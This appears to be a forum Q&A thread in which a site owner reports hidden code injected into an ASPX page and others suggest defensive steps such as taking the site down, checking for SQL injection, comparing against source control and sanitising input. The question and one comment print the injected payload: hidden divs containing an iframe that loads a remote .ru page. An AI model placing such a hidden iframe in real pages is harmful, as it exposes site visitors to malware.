# I'm being attacked - what can I do?

Tags: .net

Someone is putting this code onto my aspx page.

What are they doing?

How are they doing it?

How do I stop them?

It's on a shared hosting server.

It's on an aspx content page which has a master page and is after the `</asp:content>` tag...

```
<div style="display:none">qzfmjsdbknmrmlkszrrcehikeapphqq</div>

<div style="display:none">owhkhminltvnwvegxktzemrszyykcsh</div>

<div style="display:none">cljwdrmbxglllikbjctmpyvcflzxbqk</div>

<div style="display:none">vhhnvchdoxaklqjxlwaqvtgarazwcsx</div>

<div style="display:none">alsbcgosnllreyylgtmblvqwxgpidui</div>

<div style="display:none">yrrzaimkpvimddgirjpuatjzoyovdyq<iframe width=812 height=451 src="http://bionaft.ru:8080/index.php" ></iframe></div>
```

Comment: Thats the code

<div style="display:none">qzfmjsdbknmrmlkszrrcehikeapphqq</div>

<div style="display:none">owhkhminltvnwvegxktzemrszyykcsh</div>

<div style="display:none">cljwdrmbxglllikbjctmpyvcflzxbqk</div>

<div style="display:none">vhhnvchdoxaklqjxlwaqvtgarazwcsx</div>

<div style="display:none">alsbcgosnllreyylgtmblvqwxgpidui</div>

<div style="display:none">yrrzaimkpvimddgirjpuatjzoyovdyq<iframe width=812 height=451 src="http://bionaft.ru:8080/index.php" ></iframe></div>

Comment: please provide more info as to what code are you exactly executing on this page. are you taking user input in any form (query strings, form post, etc)?

Comment: Who's the hosting service? Are they reputable? Could it be hosting service injected advertising?

Comment: I just did a Google on "bionaft.ru" and they appear to be web-stats service. Perhaps the added code is web-stat data?

Comment: The hosting service is fine, Ive been with them for about 2 years...
the url goes to my error page here it is...
http://www.weddingwizard.com.au/mywedding/kirstymatt.aspx
Im not taking user input on this page.

Answer (score 39):

Take your site offline.

No, I'm being serious.

Take it offline and look at all points that you deal with user inputs and look at your code and sanitise every user input, and every output. There's plenty of documentation on XSS, Code Injection and such.

Comment: Are you serious, this is a production site with clients, is there a way to find where they are doing this from?

Comment: Of course I'm serious. You leave it running as it is, and search engines will crawl it with the malicious data and get you blacklisted for hosting malicious content, a banner that takes a long time to get reverted. Get your webserver logs and your code, take that site offline, clean up the code they've injected and sanitise your inputs.

Comment: Thanks for your help and your prompt reply.

Comment: dad got his production sites blacklisted this way... took long to get rid off.

Comment: Ill flick the switch tonight.

Comment: Make sure you compare your source code with an existing copy you take from you revision control system. If they could modify your source code, they could easily modify other parts to leave themselves a back door (although this is probably an automated attack). They could also have compromised your whole server...

Comment: Turn the lights off as soon as possible. Don't wait, Googlebot won't be.

Comment: It needs to go down ASAP. If your clients is using this and they see whats happening Im sure they will loose alot of respect for your site. I sure as hell would've deleted my account and stopped dealing with you ASAP as this proves holes in integrity and confidentiality

Answer (score 2):

Is it yet another Automated SQL Injection attack? Check out your logs and see if there is something with "DECLARE" in it. (assuming you are using SQL Server)

Answer (score 2):

It seems that you are not the only one. [Google](http://www.google.es/search?q=bionaft.ru%3A8080%2Findex.php) for it:

Answer (score 1):

How does the page get rendered - is there content coming from a database? What is the url? have you set validateRequest to false?

more info needed I think

Comment: Also, Have you downloaded the source file for the aspx or ascx (or whatever) for the page in question? Does it look the same as your source controlled version?

Comment: no its got the injected code in it. I removed it last night and its back I also got about 16o errors on my site with my css files I think they were scanning for something, but they got the path to the css files incorrect

Comment: Sounds like the server has been compromised fella.  If it's a manged server, get on the phone to the host... if not, I would probably flatten and resinstall everything with new passwords.  If this is not possible, change all passwords - check out user accounts on the server - remove any that you do not know about.

Answer (score 1):

> It's on an aspx content page which has a master page and is after the `</asp:content>` tag...

Do you mean someone has got onto your sever and edited the .aspx files on the server? If that's the case make sure you have locked down any file shares and change all your passwords for ftp and the like.

If it's that the rendered pages have been mashed then the advice from @squeeks is the way to go.

Comment: The page is dynamically driven from the database.
ValidateRequest is not set to false.
I dont see any weird data in the logs or the tables within the database that are affected by this page.

Its outside the content tags on the aspx page...Im beginning to think that my password has been compromised

Answer (score 0):

Try looking into the AntiXSS libary; pages that are important, turn them off for a while. I believe you will need to update the code,  use AntiXSS in every url; switch all of your direct query generation to Parameter based query generation; and than, things will be under control. Also, there is a lot of stuff regarding whitelist items on google/bing.